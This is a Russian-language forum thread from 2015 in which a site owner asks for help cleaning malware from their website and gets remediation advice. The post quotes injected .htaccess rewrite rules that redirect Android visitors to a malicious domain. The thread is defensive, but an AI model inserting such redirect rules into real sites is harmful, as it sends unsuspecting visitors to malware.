Вирус на сайте, помогите найти и удалить вредоносный код

4 марта 2015 в 22:43

Добрый вечер! Помогите срочно! Очень прошу! Не пойму как, но второй раз уже, как на сайте mytaganrog.com появляются вирусы. при нажатии на новости на сайте в Яндекс браузере показывается следующее - "Сайт bitidave.com может угрожать безопасности вашего компьютера.
Игнорировать это предупреждение
По нашим данным, на страницах сайта был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.
Более подробную информацию об угрозе или безопасную копию сайта можно посмотреть на странице с полными данными о заражении."

В файле .htaccess нашел следующие строки -

"
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "Android" [NC]
RewriteRule ^(.*)$ http://bitidave.com/mob/?mobile_version=mytaganrog.com [L,R=302]"

Этот код удалил и перезаписал сохраненной версией файла. Но редиректить на подставной сайт не перестало.

Каким образом без моего ведома они могут быть туда записаны. И как себя защитить от такого внедрения, чтобы ситуация не повторялась. И помогите найти вирус и выковырять его.

Комментарии

добрый вечер. могу ночью провести аудит ядра, модулей, темы оформления, БД. icq в профиле указан
плюс по хостингу вопрос, смотрю у вас ht-systems, кто vps администрирует или используете shared?

4 марта 2015 в 23:22

.poltergeist wrote:
добрый вечер. могу ночью провести аудит ядра, модулей, темы оформления, БД. icq в профиле указан
плюс по хостингу вопрос, смотрю у вас ht-systems, кто vps администрирует?

хостер

4 марта 2015 в 23:22

"MASTERIWE" wrote:
Каким образом без моего ведома они могут быть туда записаны

Смените пароль и не сохраняйте его у себя не компьютере. Обязательно нужно иметь хороший антивирус у себя на компьютере, если у вас Windows. Рекомендую Kaspersky Internet Security. Ничего не имею против других антивирусов, но Касперским пользуюсь сам и он меня ни разу не подводил (за 5-6 лет).

Ну и hacked! Вам в помощь.

5 марта 2015 в 6:49

Пару раз, в таком случае, помогали действия аналогичные обновлению. Удаление всех файлов кроме /sites/* и загрузка чистых.
В /sites/*, соответственно тоже следует покопаться.

5 марта 2015 в 13:51